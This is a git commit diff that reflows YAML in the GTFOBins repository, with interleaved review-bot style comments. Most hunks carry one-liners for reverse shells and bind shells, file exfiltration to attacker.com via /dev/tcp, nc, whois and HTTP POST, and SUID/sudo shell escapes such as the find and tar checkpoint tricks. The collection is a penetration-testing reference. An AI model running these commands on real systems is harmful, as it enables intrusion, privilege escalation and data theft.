Fix YAMLs according to YAMLlint

This commit is contained in:
Andrea Cardaci 2018-07-16 15:01:50 +02:00
parent 785126ede0
commit e1cd3aed68
87 changed files with 996 additions and 1061 deletions

3
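--- a/.yamllint
+++ b/.yamllint
@@ -0,0 +1,3 @@
+extends: default
+rules:
+line-length: disable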
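Review bot: `line-length: disable` switches the rule off completely, whereas yamllint's line-length rule also accepts `max` and `allow-non-breakable-words`, so a setting such as `line-length: {max: 120, allow-non-breakable-words: true}` would still catch accidental run-on text while tolerating the long unbreakable code strings this commit unwraps in the `_gtfobins` files. The rendered page appears to drop leading whitespace, so `line-length` is presumably indented under `rules:` in the actual file; the lines are reproduced here as shown. This is a point of style only; the configuration as written is valid.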


@ -1,4 +1,4 @@
.PHONY: serve serve-public bundle .PHONY: serve serve-public bundle lint
serve: serve:
bundle exec jekyll serve bundle exec jekyll serve
@ -8,3 +8,6 @@ serve-public:
bundle: bundle:
bundle install bundle install
lint:
yamllint . _gtfobins/*.md
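Review bot: The new `lint` target will not fail on warning-level findings, because `yamllint` exits 0 on warnings unless run with `-s`/`--strict`, and several rules in the `default` profile the new `.yamllint` extends (notably `document-start`, the `---` marker this commit appears to add in other files) are warning level. Consider `yamllint -s . _gtfobins/*.md` so that `make lint` actually fails on regressions when used in CI. The `_gtfobins/*.md` glob is expanded by the shell, so a directory with no `.md` files would pass the literal pattern through and yamllint would report a missing file; acceptable for a lint target, but worth knowing.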


@ -1,3 +1,4 @@
---
title: GTFOBins title: GTFOBins
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']


@ -1,3 +1,4 @@
---
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: | description: |


@ -9,15 +9,13 @@ functions:
export RPORT=12345 export RPORT=12345
bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1' bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT' bash -c 'echo -e "POST / HTTP/0.9\n\n$(<$LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -32,8 +30,7 @@ functions:
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345


@ -1,6 +1,5 @@
--- ---
description: | description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example. what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
@ -19,8 +18,7 @@ functions:
LFILE=file_to_read LFILE=file_to_read
./busybox cat "$LFILE" ./busybox cat "$LFILE"
suid-enabled: suid-enabled:
- description: It may drop the SUID privileges depending on the compilation flags - description: It may drop the SUID privileges depending on the compilation flags and the runtime configuration.
and the runtime configuration.
code: "./busybox sh" code: "./busybox sh"
sudo-enabled: sudo-enabled:
- code: sudo busybox sh - code: sudo busybox sh
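Review bot: The reflowed `description` at the top of this section still carries two pre-existing wording defects that could have been fixed while the line was being touched: `GTFBins` should read `GTFOBins`, and `Here some example.` should read `Here are some examples.` The two-line plain scalar is valid YAML (the continuation line folds into a single space), so only the text needs changing, not the structure.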


@ -1,8 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
the attacker box to collect the file.
code: | code: |
URL=http://attacker.com/ URL=http://attacker.com/
LFILE=file_to_send LFILE=file_to_send


@ -7,7 +7,7 @@ functions:
export LFILE=file_to_write export LFILE=file_to_write
ash -c 'echo data > $LFILE' ash -c 'echo data > $LFILE'
suid-enabled: suid-enabled:
- code: "./dash -p" - code: ./dash -p
sudo-enabled: sudo-enabled:
- code: sudo dash - code: sudo dash
--- ---


@ -9,9 +9,7 @@ functions:
ed file_to_write ed file_to_write
w w
file-read: file-read:
- code: 'ed file_to_read - code: ed file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo ed sudo ed


@ -7,9 +7,7 @@ functions:
emacs file_to_write emacs file_to_write
C-x C-s C-x C-s
file-read: file-read:
- code: 'emacs file_to_read - code: emacs file_to_read
'
suid-enabled: suid-enabled:
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")' - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
sudo-enabled: sudo-enabled:


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: env /bin/sh - code: env /bin/sh
suid-enabled: suid-enabled:
- code: "./env /bin/sh -p" - code: ./env /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo env /bin/sh - code: sudo env /bin/sh
--- ---


@ -1,7 +1,5 @@
--- ---
description: 'The read file content is corrupted by replacing tabs with spaces. description: The read file content is corrupted by replacing tabs with spaces.
'
functions: functions:
file-read: file-read:
- code: | - code: |


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: expect -c 'spawn /bin/sh;interact' - code: expect -c 'spawn /bin/sh;interact'
suid-enabled: suid-enabled:
- code: "./expect -c 'spawn /bin/sh -p;interact'" - code: ./expect -c 'spawn /bin/sh -p;interact'
sudo-enabled: sudo-enabled:
- code: sudo expect -c 'spawn /bin/sh;interact' - code: sudo expect -c 'spawn /bin/sh;interact'
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: find . -exec /bin/sh \; -quit - code: find . -exec /bin/sh \; -quit
suid-enabled: suid-enabled:
- code: "./find . -exec /bin/sh -p \\; -quit" - code: ./find . -exec /bin/sh -p \; -quit
sudo-enabled: sudo-enabled:
- code: sudo find . -exec /bin/sh \; -quit - code: sudo find . -exec /bin/sh \; -quit
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: flock -u / /bin/sh - code: flock -u / /bin/sh
suid-enabled: suid-enabled:
- code: "./flock -u / /bin/sh -p" - code: ./flock -u / /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo flock -u / /bin/sh - code: sudo flock -u / /bin/sh
--- ---


@ -1,7 +1,5 @@
--- ---
description: 'The read file content is not binary-safe. description: The read file content is not binary-safe.
'
functions: functions:
file-read: file-read:
- code: | - code: |


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: ionice /bin/sh - code: ionice /bin/sh
suid-enabled: suid-enabled:
- code: "./ionice /bin/sh -p" - code: ./ionice /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo ionice /bin/sh - code: sudo ionice /bin/sh
--- ---


@ -9,15 +9,13 @@ functions:
export RPORT=12345 export RPORT=12345
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1' ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
upload: upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP - description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
service on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_send export LFILE=file_to_send
ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT' ksh -c 'echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT'
- description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` - description: Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -32,8 +30,7 @@ functions:
ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \ ksh -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
on the attacker box to send the file.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
@ -53,7 +50,7 @@ functions:
export LFILE=file_to_read export LFILE=file_to_read
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"' ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
suid-enabled: suid-enabled:
- code: "./ksh -p" - code: ./ksh -p
sudo-enabled: sudo-enabled:
- code: sudo ksh - code: sudo ksh
--- ---


@ -9,9 +9,9 @@ description: |
``` ```
functions: functions:
execute-interactive: execute-interactive:
- code: "/lib/ld.so /bin/sh" - code: /lib/ld.so /bin/sh
suid-enabled: suid-enabled:
- code: "./ld.so /bin/sh -p" - code: ./ld.so /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /lib/ld.so /bin/sh - code: sudo /lib/ld.so /bin/sh
--- ---


@ -8,9 +8,7 @@ functions:
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
v v
file-read: file-read:
- code: 'less file_to_read - code: less file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo less /etc/profile sudo less /etc/profile


@ -1,8 +1,5 @@
--- ---
description: | description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
All these examples only work with GNU `make` due to the lack of support of the
`--eval` flag. The same can be achieved by using a proper `Makefile` or by
passing the content via stdin using `-f -`.
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |


@ -5,9 +5,7 @@ functions:
man man man man
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'man file_to_read - code: man file_to_read
'
sudo-enabled: sudo-enabled:
- code: | - code: |
sudo man man sudo man man


@ -5,9 +5,7 @@ functions:
TERM= more /etc/profile TERM= more /etc/profile
!/bin/sh !/bin/sh
file-read: file-read:
- code: 'more file_to_read - code: more file_to_read
'
suid-enabled: suid-enabled:
- code: "./more file_to_read\n" - code: "./more file_to_read\n"
sudo-enabled: sudo-enabled:


@ -14,9 +14,7 @@ functions:
nano file_to_write nano file_to_write
^O ^O
file-read: file-read:
- code: 'nano file_to_read - code: nano file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |


@ -12,16 +12,14 @@ functions:
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
nc $RHOST $RPORT < "$LFILE" nc $RHOST $RPORT < "$LFILE"
download: download:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
< "file_to_send"` on the attacker box to send the file.
code: | code: |
LPORT=12345 LPORT=12345
LFILE=file_to_save LFILE=file_to_save


@ -1,8 +1,5 @@
--- ---
description: 'The read file content is corrupted by a leading space added to each description: The read file content is corrupted by a leading space added to each line.
line.
'
functions: functions:
file-read: file-read:
- code: | - code: |


@ -1,9 +1,8 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
@ -26,13 +25,9 @@ functions:
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid-enabled:
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - code: |
1, 2]});'' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
'
sudo-enabled: sudo-enabled:
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - code: |
2]});'' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
--- ---


@ -1,7 +1,5 @@
--- ---
description: | description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions: functions:
file-read: file-read:
- code: | - code: |


@ -27,8 +27,7 @@ functions:
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
PHP version 5.4 or later.
code: | code: |
LHOST=0.0.0.0 LHOST=0.0.0.0
LPORT=8888 LPORT=8888


@ -14,9 +14,7 @@ functions:
pico file_to_write pico file_to_write
^O ^O
file-read: file-read:
- code: 'pico file_to_read - code: pico file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |


@ -11,8 +11,7 @@ functions:
export LFILE="/tmp/file_to_write" export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }" puppet apply -e "file { '$LFILE': content => 'data' }"
file-read: file-read:
- description: The read file content is corrupted by the `diff` output format. The - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
actual `/usr/bin/diff` command is executed.
code: | code: |
export LFILE=file_to_read export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE puppet filebucket -l diff /dev/null $LFILE


@ -3,15 +3,13 @@ functions:
execute-interactive: execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")' - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send


@ -3,15 +3,13 @@ functions:
execute-interactive: execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")' - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send


@ -3,13 +3,12 @@ functions:
execute-interactive: execute-interactive:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external - description: This adds timestamps to the output file. This relies on the external `echo` command.
`echo` command.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
rlwrap -l "$LFILE" echo data rlwrap -l "$LFILE" echo data
suid-enabled: suid-enabled:
- code: "./rlwrap -H /dev/null /bin/sh -p" - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---


@ -9,8 +9,7 @@ functions:
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
version 1.9.2 or later.
code: | code: |
export LPORT=8888 export LPORT=8888
ruby -run -e httpd . -p $LPORT ruby -run -e httpd . -p $LPORT


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid-enabled:
- code: "./setarch $(arch) /bin/sh -p" - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---


@ -1,15 +1,13 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> - description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane


@ -4,8 +4,7 @@ functions:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
x
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
@ -27,6 +26,5 @@ functions:
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo-enabled:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x
-i'" x
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid-enabled:
- code: "./stdbuf -i0 /bin/sh -p" - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid-enabled:
- code: "./strace -o /dev/null /bin/sh -p" - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---


@ -20,5 +20,5 @@ functions:
sudo-enabled: sudo-enabled:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: suid-limited:
- code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid-enabled:
- code: "./taskset 1 /bin/sh -p" - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---


@ -1,7 +1,5 @@
--- ---
description: 'It can only append data if the destination exists. description: It can only append data if the destination exists.
'
functions: functions:
file-write: file-write:
- code: | - code: |


@ -1,12 +1,10 @@
--- ---
description: | description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
Note that the shell might have its own builtin time implementation, which may
behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: execute-interactive:
- code: "/usr/bin/time /bin/sh" - code: /usr/bin/time /bin/sh
suid-enabled: suid-enabled:
- code: "./time /bin/sh -p" - code: ./time /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---
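Review bot: The `description` line unwrapped at the top of this section keeps a misplaced backtick from the original text: the backtick after `than` should move to directly before `/usr/bin/time` so that the code span wraps only the path, i.e. `... which may behave differently than` followed by a space and then the backticked `/usr/bin/time`. As written the code span starts with a leading space and the rendered page shows `than` glued to the backtick. Since the commit already rewrites this line into a single plain scalar, fixing the punctuation in the same change would have been cheap.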


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid-enabled:
- code: "./timeout 7d /bin/sh -p" - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---


@ -1,7 +1,5 @@
--- ---
description: | description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces.
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
file-read: file-read:
- code: | - code: |


@ -1,7 +1,5 @@
--- ---
description: 'The read file content is corrupted by squashing multiple adjacent lines. description: The read file content is corrupted by squashing multiple adjacent lines.
'
functions: functions:
file-read: file-read:
- code: | - code: |


@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid-enabled:
- code: "./unshare -r /bin/sh" - code: ./unshare -r /bin/sh
sudo-enabled: sudo-enabled:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---


@ -11,11 +11,9 @@ functions:
vi file_to_write vi file_to_write
w w
file-read: file-read:
- code: 'vi file_to_read - code: vi file_to_read
'
suid-enabled: suid-enabled:
- code: "./vi -c ':!/bin/sh -p'" - code: ./vi -c ':!/bin/sh -p'
sudo-enabled: sudo-enabled:
- code: sudo vi -c ':!/bin/sh' - code: sudo vi -c ':!/bin/sh'
--- ---


@ -4,9 +4,9 @@ functions:
- code: watch /usr/bin/id - code: watch /usr/bin/id
suid-enabled: suid-enabled:
- description: This keeps the SUID privileges only if the `-x` option is present. - description: This keeps the SUID privileges only if the `-x` option is present.
code: "./watch -x /usr/bin/id" code: ./watch -x /usr/bin/id
sudo-enabled: sudo-enabled:
- code: sudo watch /usr/bin/id - code: sudo watch /usr/bin/id
suid-limited: suid-limited:
- code: "./watch /usr/bin/id" - code: ./watch /usr/bin/id
--- ---


@ -1,8 +1,7 @@
--- ---
functions: functions:
upload: upload:
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
export LFILE=file_to_send export LFILE=file_to_send


@ -1,34 +1,28 @@
--- ---
description: "`whois` hangs waiting for the remote peer to close the socket.\n" description: |
`whois` hangs waiting for the remote peer to close the socket.
functions: functions:
upload: upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
and its length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`" whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
length is limited by the maximum size of arguments.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_send LFILE=file_to_send
whois -h $RHOST -p $RPORT "`base64 $LFILE`" whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download: download:
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
< "file_to_send"` on the attacker box to send the file. The file has instances
of `$'\x0d'` stripped.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
LFILE=file_to_save LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE" whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
| nc -l -p 12345` on the attacker box to send the file.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345


@ -3,14 +3,12 @@ functions:
execute-non-interactive: execute-non-interactive:
